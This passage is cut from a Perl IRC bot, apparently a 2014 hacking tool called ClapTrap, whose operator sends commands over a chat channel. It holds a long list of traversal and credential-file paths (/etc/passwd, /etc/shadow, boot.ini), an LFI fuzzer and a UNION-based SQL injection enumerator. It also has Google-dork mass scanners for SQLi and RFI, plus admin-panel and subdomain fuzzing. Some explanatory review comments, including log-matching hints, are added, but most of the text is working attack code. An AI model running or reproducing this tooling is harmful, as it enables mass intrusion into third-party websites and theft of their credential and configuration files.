  1. );
  2.  
  3. my @buscar3 = (
  4. '../../../boot.ini',
  5. '../../../../boot.ini',
  6. '../../../../../boot.ini',
  7. '../../../../../../boot.ini',
  8. '/etc/passwd',
  9. '/etc/shadow',
  10. '/etc/shadow~',
  11. '/etc/hosts',
  12. '/etc/motd',
  13. '/etc/apache/apache.conf',
  14. '/etc/fstab',
  15. '/etc/apache2/apache2.conf',
  16. '/etc/apache/httpd.conf',
  17. '/etc/httpd/conf/httpd.conf',
  18. '/etc/apache2/httpd.conf',
  19. '/etc/apache2/sites-available/default',
  20. '/etc/mysql/my.cnf',
  21. '/etc/my.cnf',
  22. '/etc/sysconfig/network-scripts/ifcfg-eth0',
  23. '/etc/redhat-release',
  24. '/etc/httpd/conf.d/php.conf',
  25. '/etc/pam.d/proftpd',
  26. '/etc/phpmyadmin/config.inc.php',
  27. '/var/www/config.php',
  28. '/etc/httpd/logs/error_log',
  29. '/etc/httpd/logs/error.log',
  30. '/etc/httpd/logs/access_log',
  31. '/etc/httpd/logs/access.log',
  32. '/var/log/apache/error_log',
  33. '/var/log/apache/error.log',
  34. '/var/log/apache/access_log',
  35. '/var/log/apache/access.log',
  36. '/var/log/apache2/error_log',
  37. '/var/log/apache2/error.log',
  38. '/var/log/apache2/access_log',
  39. '/var/log/apache2/access.log',
  40. '/var/www/logs/error_log',
  41. '/var/www/logs/error.log',
  42. '/var/www/logs/access_log',
  43. '/var/www/logs/access.log',
  44. '/usr/local/apache/logs/error_log',
  45. '/usr/local/apache/logs/error.log',
  46. '/usr/local/apache/logs/access_log',
  47. '/usr/local/apache/logs/access.log',
  48. '/var/log/error_log',
  49. '/var/log/error.log',
  50. '/var/log/access_log',
  51. '/var/log/access.log',
  52. '/etc/group',
  53. '/etc/security/group',
  54. '/etc/security/passwd',
  55. '/etc/security/user',
  56. '/etc/security/environ',
  57. '/etc/security/limits',
  58. '/usr/lib/security/mkuser.default',
  59. '/apache/logs/access.log',
  60. '/apache/logs/error.log',
  61. '/etc/httpd/logs/acces_log',
  62. '/etc/httpd/logs/acces.log',
  63. '/var/log/httpd/access_log',
  64. '/var/log/httpd/error_log',
  65. '/apache2/logs/error.log',
  66. '/apache2/logs/access.log',
  67. '/logs/error.log',
  68. '/logs/access.log',
  69. '/usr/local/apache2/logs/access_log',
  70. '/usr/local/apache2/logs/access.log',
  71. '/usr/local/apache2/logs/error_log',
  72. '/usr/local/apache2/logs/error.log',
  73. '/var/log/httpd/access.log',
  74. '/var/log/httpd/error.log',
  75. '/opt/lampp/logs/access_log',
  76. '/opt/lampp/logs/error_log',
  77. '/opt/xampp/logs/access_log',
  78. '/opt/xampp/logs/error_log',
  79. '/opt/lampp/logs/access.log',
  80. '/opt/lampp/logs/error.log',
  81. '/opt/xampp/logs/access.log',
  82. '/opt/xampp/logs/error.log',
  83. 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
  84. 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
  85. '/usr/local/apache/conf/httpd.conf',
  86. '/usr/local/apache2/conf/httpd.conf',
  87. '/etc/apache/conf/httpd.conf',
  88. '/usr/local/etc/apache/conf/httpd.conf',
  89. '/usr/local/apache/httpd.conf',
  90. '/usr/local/apache2/httpd.conf',
  91. '/usr/local/httpd/conf/httpd.conf',
  92. '/usr/local/etc/apache2/conf/httpd.conf',
  93. '/usr/local/etc/httpd/conf/httpd.conf',
  94. '/usr/apache2/conf/httpd.conf',
  95. '/usr/apache/conf/httpd.conf',
  96. '/usr/local/apps/apache2/conf/httpd.conf',
  97. '/usr/local/apps/apache/conf/httpd.conf',
  98. '/etc/apache2/conf/httpd.conf',
  99. '/etc/http/conf/httpd.conf',
  100. '/etc/httpd/httpd.conf',
  101. '/etc/http/httpd.conf',
  102. '/etc/httpd.conf',
  103. '/opt/apache/conf/httpd.conf',
  104. '/opt/apache2/conf/httpd.conf',
  105. '/var/www/conf/httpd.conf',
  106. '/private/etc/httpd/httpd.conf',
  107. '/private/etc/httpd/httpd.conf.default',
  108. '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
  109. '/Volumes/webBackup/private/etc/httpd/httpd.conf',
  110. '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
  111. 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
  112. 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
  113. 'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
  114. '/usr/local/php/httpd.conf.php',
  115. '/usr/local/php4/httpd.conf.php',
  116. '/usr/local/php5/httpd.conf.php',
  117. '/usr/local/php/httpd.conf',
  118. '/usr/local/php4/httpd.conf',
  119. '/usr/local/php5/httpd.conf',
  120. '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
  121. '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
  122. '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
  123. '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
  124. '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
  125. '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
  126. '/usr/local/etc/apache/vhosts.conf',
  127. '/etc/php.ini',
  128. '/bin/php.ini',
  129. '/etc/httpd/php.ini',
  130. '/usr/lib/php.ini',
  131. '/usr/lib/php/php.ini',
  132. '/usr/local/etc/php.ini',
  133. '/usr/local/lib/php.ini',
  134. '/usr/local/php/lib/php.ini',
  135. '/usr/local/php4/lib/php.ini',
  136. '/usr/local/php5/lib/php.ini',
  137. '/usr/local/apache/conf/php.ini',
  138. '/etc/php4.4/fcgi/php.ini',
  139. '/etc/php4/apache/php.ini',
  140. '/etc/php4/apache2/php.ini',
  141. '/etc/php5/apache/php.ini',
  142. '/etc/php5/apache2/php.ini',
  143. '/etc/php/php.ini',
  144. '/etc/php/php4/php.ini',
  145. '/etc/php/apache/php.ini',
  146. '/etc/php/apache2/php.ini',
  147. '/web/conf/php.ini',
  148. '/usr/local/Zend/etc/php.ini',
  149. '/opt/xampp/etc/php.ini',
  150. '/var/local/www/conf/php.ini',
  151. '/etc/php/cgi/php.ini',
  152. '/etc/php4/cgi/php.ini',
  153. '/etc/php5/cgi/php.ini',
  154. 'c:\php5\php.ini',
  155. 'c:\php4\php.ini',
  156. 'c:\php\php.ini',
  157. 'c:\PHP\php.ini',
  158. 'c:\WINDOWS\php.ini',
  159. 'c:\WINNT\php.ini',
  160. 'c:\apache\php\php.ini',
  161. 'c:\xampp\apache\bin\php.ini',
  162. 'c:\NetServer\bin\stable\apache\php.ini',
  163. 'c:\home2\bin\stable\apache\php.ini',
  164. 'c:\home\bin\stable\apache\php.ini',
  165. '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
  166. '/usr/local/cpanel/logs',
  167. '/usr/local/cpanel/logs/stats_log',
  168. '/usr/local/cpanel/logs/access_log',
  169. '/usr/local/cpanel/logs/error_log',
  170. '/usr/local/cpanel/logs/license_log',
  171. '/usr/local/cpanel/logs/login_log',
  172. '/var/cpanel/cpanel.config',
  173. '/var/log/mysql/mysql-bin.log',
  174. '/var/log/mysql.log',
  175. '/var/log/mysqlderror.log',
  176. '/var/log/mysql/mysql.log',
  177. '/var/log/mysql/mysql-slow.log',
  178. '/var/mysql.log',
  179. '/var/lib/mysql/my.cnf',
  180. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
  181. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
  182. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
  183. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
  184. 'C:\ProgramFiles\MySQL\data\hostname.err',
  185. 'C:\ProgramFiles\MySQL\data\mysql.log',
  186. 'C:\ProgramFiles\MySQL\data\mysql.err',
  187. 'C:\ProgramFiles\MySQL\data\mysql-bin.log',
  188. 'C:\MySQL\data\hostname.err',
  189. 'C:\MySQL\data\mysql.log',
  190. 'C:\MySQL\data\mysql.err',
  191. 'C:\MySQL\data\mysql-bin.log',
  192. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
  193. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
  194. 'C:\ProgramFiles\MySQL\my.ini',
  195. 'C:\ProgramFiles\MySQL\my.cnf',
  196. 'C:\MySQL\my.ini',
  197. 'C:\MySQL\my.cnf',
  198. '/etc/logrotate.d/proftpd',
  199. '/www/logs/proftpd.system.log',
  200. '/var/log/proftpd',
  201. '/etc/proftp.conf',
  202. '/etc/protpd/proftpd.conf',
  203. '/etc/vhcs2/proftpd/proftpd.conf',
  204. '/etc/proftpd/modules.conf',
  205. '/var/log/vsftpd.log',
  206. '/etc/vsftpd.chroot_list',
  207. '/etc/logrotate.d/vsftpd.log',
  208. '/etc/vsftpd/vsftpd.conf',
  209. '/etc/vsftpd.conf',
  210. '/etc/chrootUsers',
  211. '/var/log/xferlog',
  212. '/var/adm/log/xferlog',
  213. '/etc/wu-ftpd/ftpaccess',
  214. '/etc/wu-ftpd/ftphosts',
  215. '/etc/wu-ftpd/ftpusers',
  216. '/usr/sbin/pure-config.pl',
  217. '/usr/etc/pure-ftpd.conf',
  218. '/etc/pure-ftpd/pure-ftpd.conf',
  219. '/usr/local/etc/pure-ftpd.conf',
  220. '/usr/local/etc/pureftpd.pdb',
  221. '/usr/local/pureftpd/etc/pureftpd.pdb',
  222. '/usr/local/pureftpd/sbin/pure-config.pl',
  223. '/usr/local/pureftpd/etc/pure-ftpd.conf',
  224. '/etc/pure-ftpd/pure-ftpd.pdb',
  225. '/etc/pureftpd.pdb',
  226. '/etc/pureftpd.passwd',
  227. '/etc/pure-ftpd/pureftpd.pdb',
  228. '/var/log/pure-ftpd/pure-ftpd.log',
  229. '/logs/pure-ftpd.log',
  230. '/var/log/pureftpd.log',
  231. '/var/log/ftp-proxy/ftp-proxy.log',
  232. '/var/log/ftp-proxy',
  233. '/var/log/ftplog',
  234. '/etc/logrotate.d/ftp',
  235. '/etc/ftpchroot',
  236. '/etc/ftphosts',
  237. '/var/log/exim_mainlog',
  238. '/var/log/exim/mainlog',
  239. '/var/log/maillog',
  240. '/var/log/exim_paniclog',
  241. '/var/log/exim/paniclog',
  242. '/var/log/exim/rejectlog',
  243. '/var/log/exim_rejectlog'
  244. );
  245.  
# Shared HTTP client used by every fetch helper in this file (toma, tomar,
# tomados, tomax).
my $nave = LWP::UserAgent->new();
$nave->timeout(5);    # LWP timeout of 5 seconds per request

# Every request made through $nave carries this fixed User-Agent string.
# Because it never varies, it is a usable match string in web-server logs.
$nave->agent(
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
);

# File-scope state read by party() and the helpers declared inside it.
my $servidor;    # IRC server host
my $canal;       # IRC channel
my $nick;        # nick the bot registers with
my $port;        # IRC server port
my $lider;       # nick whose messages are accepted as commands
my $soquete;     # IRC socket, opened in party()

head();

# First run: when there is no config.txt in the working directory, prompt on
# standard input and append the answers to config.txt as key=value lines.
# The `my $port` / `my $canal` declared here are local to this block and
# shadow the file-scope variables of the same name.
unless ( -f "config.txt" ) {

    print "\n[+] Server : ";
    chomp( my $server = <stdin> );
    print "\n[+] Port : ";
    chomp( my $port = <stdin> );
    print "\n[+] Channel : ";
    chomp( my $canal = <stdin> );
    print "\n[+] Your Nick : ";
    chomp( my $nickz = <stdin> );

    savefile( "config.txt", "server=" . $server );
    savefile( "config.txt", "canal=" . $canal );
    savefile( "config.txt", "puerto=" . $port );
    savefile( "config.txt", "nick=" . $nickz );

    print "\n[+] Installed ...\n\n";

}

# Read config.txt back and pull the four values out with unanchored
# key=(.*) patterns; the values are used as written, without validation.
my $codez = abrir();
my $tengo_server;
my $tengo_canal;
my $tengo_puerto;
my $tengo_nick;

# Set by party(): 1 while the last PRIVMSG seen came from the operator nick.
my $control;

if ( $codez =~ /server=(.*)/ ) {
    $tengo_server = $1;
}

if ( $codez =~ /canal=(.*)/ ) {
    $tengo_canal = $1;
}

if ( $codez =~ /puerto=(.*)/ ) {
    $tengo_puerto = $1;
}

if ( $codez =~ /nick=(.*)/ ) {
    $tengo_nick = $1;
}

$servidor = $tengo_server;
$canal = $tengo_canal;
$nick = "ClapTrap";      # the bot's own nick is hard-coded
$port = $tengo_puerto;
$lider = $tengo_nick;    # the "nick" entry of config.txt is the operator

party();
  312.  
# Main loop of the bot: connects to the configured IRC server, joins the
# channel and runs "!command" messages on behalf of the operator nick.
# The while loop and the sub itself are closed further down the file, after
# several named subs that are declared inside this body.
sub party {

    print "[+] Starting the bot\n";

    # Plain TCP connection: no TLS layer is set up and no PASS is sent.
    $soquete = new IO::Socket::INET(
        PeerAddr => $servidor,
        PeerPort => $port,
        Proto => 'tcp'
    );

    if ( !$soquete ) {
        print "\n[-] Error\n";
        exit 1;
    }

    # IRC registration followed by the channel join.
    print $soquete "NICK $nick\r\n";
    print $soquete "USER $nick 1 1 1 1\r\n";
    print $soquete "JOIN $canal\r\n";

    print "[+] Online\n\n";

    while ( my $log = <$soquete> ) {
        chomp($log);

        # Keep-alive: echo the server's PING payload back as PONG.
        if ( $log =~ /^PING(.*)$/i ) {
            print $soquete "PONG $1\r\n";
        }

        # Authorisation. The text before '!' in the message prefix (the
        # sender's nick) is compared with the configured operator nick.
        # That comparison is the only check made: no password, hostmask or
        # channel is tested. $control is file-scoped and is only assigned
        # here, so its value carries over to lines that are not PRIVMSGs.
        if ( $log =~ /:(.*)!(.*) PRIVMSG (.*) :(.*)/ ) {
            if ( $1 eq $lider ) {
                $control = 1;
            }
            else {
                $control = "Fuck You";
            }
        }

        # Command dispatch. Each handler matches its "!name" anywhere in the
        # raw IRC line, and replies are always sent to $canal. Text taken
        # from remote responses is interpolated into the outgoing IRC line
        # as-is.
        if ( $control eq 1 ) {

            # !help: print the command list.
            if ( $log =~ m/:!help/g ) {
                print $soquete
                  "PRIVMSG $canal : Hi , I am ClapTrap an assistant robot programmed by Doddy Hackman in the year 2014\r\n";
                print $soquete "PRIVMSG $canal : [++] Commands\r\n";
                print $soquete "PRIVMSG $canal : [+] !help\r\n";
                print $soquete "PRIVMSG $canal : [+] !locateip <web>\r\n";
                print $soquete "PRIVMSG $canal : [+] !sqlifinder <dork>\r\n";
                print $soquete "PRIVMSG $canal : [+] !rfifinder <dork>\r\n";
                print $soquete "PRIVMSG $canal : [+] !panel <page>\r\n";
                print $soquete "PRIVMSG $canal : [+] !sqli <page>\r\n";
                print $soquete "PRIVMSG $canal : [+] !fuzzdns <page>\r\n";
                print $soquete "PRIVMSG $canal : [+] !lfi <page>\r\n";
                print $soquete "PRIVMSG $canal : [+] !crackit <hash>\r\n";
                print $soquete "PRIVMSG $canal : [+] !tinyurl <page>\r\n";
                print $soquete "PRIVMSG $canal : [+] !httpfinger <page>\r\n";
                print $soquete "PRIVMSG $canal : [+] !md5 <text>\r\n";
                print $soquete
                  "PRIVMSG $canal : [+] !base64 <encode/decode> <text>\r\n";
                print $soquete
                  "PRIVMSG $canal : [+] !ascii <encode/decode> <text>\r\n";
                print $soquete
                  "PRIVMSG $canal : [+] !hex <encode/decode> <text> \r\n";
                print $soquete "PRIVMSG $canal : [++] Enjoy this IRC Bot\r\n";
            }

            #print $log."\n";

            # !crackit <hash>: hand the hash to crackit(), which submits it
            # to third-party lookup sites.
            if ( $log =~ m/:!crackit/ ) {

                $log =~ /:(.*)!(.*)\sPRIVMSG\s(.*)\s:(.*)\s(.*)\s(.*)/;

                # NOTE(review): `==` is a numeric comparison; the !lfi
                # handler below uses `eq` for the equivalent test.
                if ( $4 == "!crackit" ) {

                    my $hash = $5;

                    print $soquete "PRIVMSG $canal : [+] Working ...\r\n";

                    # crackit() returns the sentinel "false01" on a miss.
                    my $re = crackit($hash);
                    unless ( $re =~ /false01/ ) {
                        print $soquete "PRIVMSG $canal : [+] MD5 : $re\r\n";
                    }
                    else {
                        print $soquete
                          "PRIVMSG $canal : [-] Hash not Found\r\n";
                    }

                    print $soquete "PRIVMSG $canal : [+] Finished\r\n";

                }

            }

            # !panel <page>/: pass the text before the last '/' to scan().
            if ( $log =~ m/:!panel (.*)\// ) {

                my $page = $1;
                chomp $page;
                print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
                scan($page);
                print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";

            }

            # !md5 <text>: reply with the MD5 hex digest of the text.
            if ( $log =~ m/:!md5 (.*)$/ ) {

                my $text = $1;
                chomp $text;

                print $soquete "PRIVMSG $canal : [+] MD5 : "
                  . md5_hex($text) . "\r\n";

            }

            # !httpfinger <page>: one GET to the given URL, then four of the
            # response headers are relayed to the channel.
            if ( $log =~ m/:!httpfinger (.*)$/g ) {

                my $page = $1;

                print $soquete "PRIVMSG $canal : [+] Working ...\r\n";

                my $coded = $nave->get($page);

                print $soquete "PRIVMSG $canal : [+] Date : "
                  . $coded->header('date') . "\r\n";
                print $soquete "PRIVMSG $canal : [+] Server : "
                  . $coded->header('server') . "\r\n";
                print $soquete "PRIVMSG $canal : [+] Connection : "
                  . $coded->header('connection') . "\r\n";
                print $soquete "PRIVMSG $canal : [+] Content-Type : "
                  . $coded->header('content-type') . "\r\n";

                print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
            }

            # !tinyurl <page>: send the URL to the tinyurl.com create API
            # and relay the body of the reply.
            if ( $log =~ m/:!tinyurl (.*)$/g ) {
                my $page = $1;

                print $soquete "PRIVMSG $canal : [+] Working ...\r\n";

                my $code =
                  toma( "http://tinyurl.com/api-create.php?url=" . $page );

                unless ( $code =~ /Error/ig ) {
                    print $soquete "PRIVMSG $canal : [+] Link : $code\r\n";
                }
                else {
                    print $soquete "PRIVMSG $canal : [-] Error\r\n";
                }

            }

            # !locateip <web>/: pass the text before the last '/' to
            # infocon().
            if ( $log =~ m/:!locateip (.*)\//g ) {

                print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
                infocon($1);
                print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";

            }

            # !sqlifinder <dork>: take the URLs returned by google() and
            # request each one with "-1+union+select+666--" appended. A page
            # is reported when the MySQL column-count error text comes back.
            # Every probe carries that literal suffix in its request URL.
            if ( $log =~ m/:!sqlifinder (.*)$/g ) {

                print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
                my $dork = $1;
                my @paginas = &google( $dork, "30" ); # 30 EDIT
                print $soquete "PRIVMSG $canal : [+] SQL Scan Started\r\n";
                print $soquete "PRIVMSG $canal : [+] Searching pages\r\n";
                print $soquete "PRIVMSG $canal : [Webs Count] : "
                  . int(@paginas) . "\r\n";
                print $soquete "PRIVMSG $canal : [Status] : Scanning\r\n";

                for my $page (@paginas) {
                    my ( $pass1, $pass2 ) = ( "+", "--" );
                    $code1 =
                      toma( $page . "-1"
                          . $pass1 . "union"
                          . $pass1
                          . "select"
                          . $pass1 . "666"
                          . $pass2 );
                    if ( $code1 =~
                        /The used SELECT statements have a different number of columns/ig
                      )
                    {
                        print $soquete "PRIVMSG $canal : [+] SQLI : $page\r\n";
                    }
                }
                print $soquete "PRIVMSG $canal : [+] Finished\r\n";
            }

            # !rfifinder <dork>: same URL source as !sqlifinder. Each URL is
            # requested with a fixed external address appended, and the page
            # is reported when a phrase from that external site shows up in
            # the response.
            if ( $log =~ m/:!rfifinder (.*)$/g ) {

                print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
                my $dork = $1;
                my @paginas = &google( $dork, "30" ); # 30 EDIT
                print $soquete "PRIVMSG $canal : [+] RFI Scan Started\r\n";
                print $soquete "PRIVMSG $canal : [+] Searching pages\r\n";
                print $soquete "PRIVMSG $canal : [Webs Count] : "
                  . int(@paginas) . "\r\n";
                print $soquete "PRIVMSG $canal : [Status] : Scanning\r\n";

                for my $page (@paginas) {
                    $code1 = toma( $page . "http:/www.supertangas.com/" );
                    if ( $code1 =~ /Los mejores TANGAS de la red/ig )
                    { # This is real knowledge xDDD
                        print $soquete "PRIVMSG $canal : [+] RFI : $page\r\n";
                    }
                }
                print $soquete "PRIVMSG $canal : [+] Finished\r\n";
            }

            # !sqli <page>: run scan2() against one URL.
            if ( $log =~ m/:!sqli (.*)$/g ) {
                print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
                print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
                scan2($1);
            }

            # !fuzzdns <page>: run scan1() against one domain.
            if ( $log =~ m/:!fuzzdns (.*)$/g ) {
                print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
                scan1($1);
                print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
            }

            # !lfi <page>: run lfi() against one URL. The second pattern
            # needs two further space-separated fields after the command.
            if ( $log =~ m/:!lfi/ ) {

                $log =~ /:(.*)!(.*)\sPRIVMSG\s(.*)\s:(.*)\s(.*)\s(.*)/;

                if ( $4 eq "!lfi" ) {

                    my $page = $5;

                    print $soquete "PRIVMSG $canal : [+] Working ...\r\n";
                    lfi($page);
                    print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
                }
            }

            # !base64 / !ascii / !hex <encode|decode> <text>: local text
            # conversions, no network traffic other than the IRC reply.
            # `chop` drops the last character of the argument (presumably
            # the "\r" that chomp left on the line).
            if ( $log =~ m/:!base64 (.*) (.*)$/g ) {
                # `use` takes effect at compile time, wherever it is written.
                use MIME::Base64;
                my ( $opcion, $aa ) = ( $1, $2 );
                chop $aa;
                if ( $opcion eq "encode" ) {
                    print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
                    print $soquete "PRIVMSG $canal : [+] Encode : "
                      . encode_base64($aa) . "\r\n";
                }
                elsif ( $opcion eq "decode" ) {
                    print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
                    print $soquete "PRIVMSG $canal : [+] Text : "
                      . decode_base64($aa) . "\r\n";
                }
                else {
                    print $soquete "PRIVMSG $canal : ??\r\n";
                }
            }

            if ( $log =~ m/:!ascii (.*) (.*)$/ ) {
                my ( $opcion, $aa ) = ( $1, $2 );
                chop $aa;
                if ( $opcion eq "encode" ) {
                    print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
                    print $soquete "PRIVMSG $canal : [+] Encode : "
                      . ascii($aa) . "\r\n";
                }
                elsif ( $opcion eq "decode" ) {
                    print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
                    print $soquete "PRIVMSG $canal : [+] Text : "
                      . ascii_de($aa) . "\r\n";
                }
                else {
                    print $soquete "PRIVMSG $canal : ???\r\n";
                }
            }

            if ( $log =~ m/:!hex (.*) (.*)$/ ) {
                my ( $opcion, $aa ) = ( $1, $2 );
                chop $aa;
                if ( $opcion eq "encode" ) {
                    print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
                    print $soquete "PRIVMSG $canal : [+] Encode : "
                      . encode($aa) . "\r\n";
                }
                elsif ( $opcion eq "decode" ) {
                    print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
                    print $soquete "PRIVMSG $canal : [+] Text : "
                      . decode($aa) . "\r\n";
                }
                else {
                    print $soquete "PRIVMSG $canal : ????\r\n";
                }
            }
        }
  601.  
# !lfi handler. $_[0] is the URL prefix to which each probe value is
# appended; results go to the IRC channel, nothing is returned.
#
# What a target sees: one request ending in a single quote, then one request
# per entry of @buscar3 with the file path appended to the same parameter.
sub lfi {

    print $soquete "PRIVMSG $canal : [+] Status : [scanning]" . "\r\n";

    # Step 1: append "'" and look for PHP's include/open failure message
    # (English or Spanish wording). The captured file name is reported as a
    # path disclosure.
    $code = toma( $_[0] . "'" );
    if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ig
        or $code =~
        /No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig
      )
    {
        print $soquete "PRIVMSG $canal : [+] Vulnerable !" . "\r\n";
        print $soquete
          "PRIVMSG $canal : [*] Full path discloure detected : $1"
          . "\r\n";
        print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"
          . "\r\n";

        # Step 2: request every path in @buscar3. A path is reported as
        # "File Found" when the error text is absent, so the report means
        # only that the error string was not seen in the response.
        # The second alternative tests $code (the step-1 response), not
        # $code1.
        for my $file (@buscar3) {
            $code1 = toma( $_[0] . $file );
            unless ( $code1 =~
                /No such file or directory in <b>(.*)<\/b> on line/ig
                or $code =~
                /No existe el fichero o el directorio in <b>(.*?)<\/b> on line/ig
              )
            {
                $ok = 1;    # package variable; this sub never resets it
                print $soquete "PRIVMSG $canal : [File Found] : "
                  . $_[0]
                  . $file . "\r\n";
            }
        }
        unless ( $ok == 1 ) {
            print $soquete "PRIVMSG $canal : [-] Dont found any file"
              . "\r\n";
        }
    }
    else {
        print $soquete
          "PRIVMSG $canal : [-] Page not vulnerable to LFI" . "\r\n";
    }
}
  642.  
# !fuzzdns handler. For every label in @dns (declared outside this section)
# it requests http://<label>.<domain> and reports the names that answer with
# a successful HTTP status. $_[0] is the domain.
sub scan1 {
    print $soquete "PRIVMSG $canal : [*] Searching DNS to "
      . $_[0] . "\r\n";
    for my $path (@dns) {
        # tomax() returns the response object, not the body.
        $code = tomax( "http://" . $path . "." . $_[0] );
        if ( $code->is_success ) {
            print $soquete "PRIVMSG $canal : http://"
              . $path . "."
              . $_[0] . "\r\n";
        }
    }
}
  655.  
# !panel handler. Requests <page>/<path> for every entry of @panels
# (declared outside this section) and reports those that return a successful
# HTTP status. The target sees one request per list entry.
# The PRIVMSG lines in this sub are written without the ':' that the other
# handlers put before the message text.
sub scan {
    my $page = shift;
    chomp $page;
    print $soquete "PRIVMSG $canal [*] Searching panels to "
      . $page . "\r\n";

    for my $path (@panels) {
        # tomados() returns the response object, not the body.
        $code = tomados( $page . "/" . $path );
        if ( $code->is_success ) {
            print "\a";    # terminal bell on the machine running the bot
            $ct = 1;       # package variable; this sub never resets it
            print $soquete "PRIVMSG $canal [Link] : "
              . $page . "/"
              . $path . "\r\n";
        }
    }
    if ( $ct ne 1 ) {
        print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
    }
}
  676.  
# !sqli handler. $_[0] is the URL to test. All probes are GET requests with
# the payload appended to that URL, so each one appears in full in the
# target's request log. Strings to look for there:
#   - "order" ... "by9999999999"
#   - "union" ... "select" ... "666"
#   - "char(82,65,84,83,88,80,68,79,87,78,..." (the marker RATSXPDOWN written
#     as decimal code points by ascii())
# The marker itself appears in clear only in the response body.
# The separator and terminator between keywords come from bypass(), which is
# keyed on the script's second command-line argument.
# The sub details is declared inside this body; scan2 is closed after it.
sub scan2 {

    my $rows = "0";
    my $asc;
    my $page = $_[0];

    ( $pass1, $pass2 ) = &bypass( $ARGV[1] );

    # Probe 1: an ORDER BY with an out-of-range column number, then a search
    # of the response for MySQL/PHP error text.
    $inyection =
        $page . "-1"
      . $pass1 . "order"
      . $pass1 . "by"
      . "9999999999"
      . $pass2;
    $code = toma($inyection);
    if ( $code =~
        /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
        || $code =~ /mysql_free_result/ig
        || $code =~ /mysql_fetch_assoc/ig
        || $code =~ /mysql_num_rows/ig
        || $code =~ /mysql_fetch_array/ig
        || $code =~ /mysql_fetch_assoc/ig
        || $code =~ /mysql_query/ig
        || $code =~ /mysql_free_result/ig
        || $code =~ /equivocado en su sintax/ig
        || $code =~ /You have an error in your SQL syntax/ig
        || $code =~ /Call to undefined function/ig )
    {
        # Probe 2: a one-column UNION SELECT; the column-count error text
        # must be present for the scan to continue.
        $code1 =
          toma( $page . "-1"
              . $pass1 . "union"
              . $pass1
              . "select"
              . $pass1 . "666"
              . $pass2 );
        if ( $code1 =~
            /The used SELECT statements have a different number of columns/ig
          )
        {
            # NOTE(review): the pattern just matched has no capture group,
            # so $1 is not set by it.
            my $path = $1;
            chomp $path;
            $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
            $total = "1";

            # Probes 3..n: grow the column list from 2 up to 52 columns,
            # one request per step. Each column is a numbered marker, so the
            # columns echoed by the page can be read from the response.
            for my $rows ( 2 .. 52 ) {
                $asc .= "," . "char("
                  . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
                $total .= "," . $rows;
                $injection =
                    $page . "-1"
                  . $pass1 . "union"
                  . $pass1
                  . "select"
                  . $pass1
                  . $alert
                  . $asc;
                $test = toma($injection);
                if ( $test =~ /RATSXPDOWN/ ) {
                    @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
                    print $soquete
                      "PRIVMSG $canal : [Page] : $page\r\n";
                    print $soquete
                      "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
                    print $soquete
                      "PRIVMSG $canal : [Data] : The number @number print data\r\n";
                    if ( $test =~ /RATSXPDOWN(\d+)/ ) {
                        if ($path) {
                            print $soquete
                              "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
                        }

                        # Replace the first echoed column number in the
                        # list with the placeholder "hackman"; details()
                        # later splits the URL on that word.
                        $total =~ s/@number[0]/hackman/;
                        print $soquete
                          "PRIVMSG $canal : [+] Injection SQL : "
                          . $page . "-1"
                          . $pass1 . "union"
                          . $pass1
                          . "select"
                          . $pass1
                          . $total . "\r\n";
                        &details(
                            $page . "-1"
                              . $pass1 . "union"
                              . $pass1
                              . "select"
                              . $pass1
                              . $total,
                            $_[1]
                        );
                        last;
                    }
                }
            }
        }
    }

    # Follow-up requests for a URL that scan2 found injectable. $_[0] is the
    # URL containing the "hackman" placeholder. The marker used here is
    # char(69,82,84,79,82,56,53,52), i.e. the string ERTOR854; in request
    # logs it appears inside "unhex(hex(concat(char(69,82,84,79,82,56,53,52)".
    sub details {
        my $page = $_[0];
